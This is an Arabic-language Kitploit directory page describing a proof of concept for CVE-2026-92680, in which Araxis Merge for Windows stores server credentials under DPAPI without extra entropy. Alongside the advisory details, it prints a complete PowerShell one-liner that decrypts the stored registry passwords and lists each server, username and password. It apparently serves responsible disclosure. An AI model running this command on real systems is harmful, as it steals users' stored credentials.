Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-92680 — إثبات مفهوم لفك تشفير بيانات اعتماد الخادم المحمية بـ DPAPI في Araxis Merge (CVE-2026-92680)، مما يوضح تخزين بيانات الاعتماد غير المحمية بشكل كافٍ على Windows. | Kitploit
أدوات/GitHubGitHub/grepstrength/cve-2026-92680
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالالتشفير
GitHubgrepstrength/cve-2026-92680

CVE-2026-92680

إثبات مفهوم لفك تشفير بيانات اعتماد الخادم المحمية بـ DPAPI في Araxis Merge (CVE-2026-92680)، مما يوضح تخزين بيانات الاعتماد غير المحمية بشكل كافٍ على Windows.

عرض المستودع
11منذ 0 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-92680

يقوم Araxis Merge for Windows بتخزين بيانات اعتماد الخادم باستخدام DPAPI مع تعيين pOptionalEntropy إلى NULL. وهذا يسمح لأي تعليمات برمجية تعمل في سياق المستخدم نفسه بفك تشفيرها.

التحليل الكامل: https://grepstrength.com/research/araxis-merge

CVECVE-2026-92680
CWECWE-522: بيانات اعتماد محمية بشكل غير كافٍ
CVSS v3.15.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
المورّدAraxis Ltd.
المتأثرAraxis Merge for Windows 2011.4074 حتى 2026.0
تم الإصلاح في2026.1
إشعار المورّدMerge-SA-26-00
تاريخ الإبلاغ2026-08-18
تاريخ الكشف2026-XX-XX
المُبلِّغgrepStrength

إثبات المفهوم

سيقوم هذا بفك تشفير وتحليل HKCU\Software\Araxis\Merge\7.1\Passwords. يجب تشغيل هذا بنفس مستخدم Windows الذي خزّن بيانات الاعتماد في الأصل.

root@kitploit:~
Add-Type -AssemblyName System.Security; $p=[Security.Cryptography.ProtectedData]::Unprotect((Get-ItemProperty "HKCU:\Software\Araxis\Merge\7.1").Passwords,$null,'CurrentUser'); $i=48; $f=@(); while($i -lt $p.Length){$l=[BitConverter]::ToInt64($p,$i+8);$i+=16;$f+=[Text.Encoding]::Unicode.GetString($p,$i,$l*2);$i+=$l*2}; 0..($f.Count/4-1)|%{[PSCustomObject]@{Server=$f[$_*4+1];Username=$f[$_*4+2];Password=$f[$_*4+3]}}|Format-Table -AutoSize

ملاحظات

تم إجراء جميع الاختبارات على أنظمة مملوكة لـ grepStength Security باستخدام بيانات اعتماد اصطناعية فقط. تم الإبلاغ عن هذا إلى Araxis Ltd. والكشف عنه علنًا بعد توفر الإصلاح.

الترخيص

MIT

تنزيل الأداة